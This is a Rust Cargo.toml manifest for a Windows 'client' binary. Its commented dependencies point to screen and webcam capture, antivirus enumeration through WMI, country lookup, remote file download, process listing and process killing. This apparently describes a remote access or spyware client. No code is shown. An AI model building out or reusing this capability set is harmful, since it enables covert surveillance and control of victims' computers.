[package]
name    = "client"
version = "0.1.0"
edition = "2021"

[[bin]]
name = "client"
path = "src/main.rs"

[profile.release]
opt-level = 3
lto       = true
strip     = true
panic     = "abort"

[dependencies]
base64      = "0.22"
serde_json  = "1"
zip         = "0.6"
image       = { version = "0.25", default-features = false, features = ["jpeg"] }
nokhwa      = { version = "0.10", features = ["input-msmf"] }

[target.'cfg(target_os = "windows")'.dependencies]
windows = { version = "0.58", features = [
    # GDI screen capture
    "Win32_Graphics_Gdi",
    "Win32_UI_WindowsAndMessaging",
    "Win32_Foundation",
    # Registry (sysinfo)
    "Win32_System_Registry",
    # WMI / COM (antivirus)
    "Win32_System_Com",
    "Win32_System_Wmi",
    "Win32_System_Variant",
    # WinHTTP (country lookup + rfe download)
    "Win32_Networking_WinHttp",
    # ToolHelp32 (tasklist)
    "Win32_System_Diagnostics_ToolHelp",
    # Process management (taskkill)
    "Win32_System_Threading",
    "Win32_System_ProcessStatus",
    "Win32_Storage_FileSystem",
] }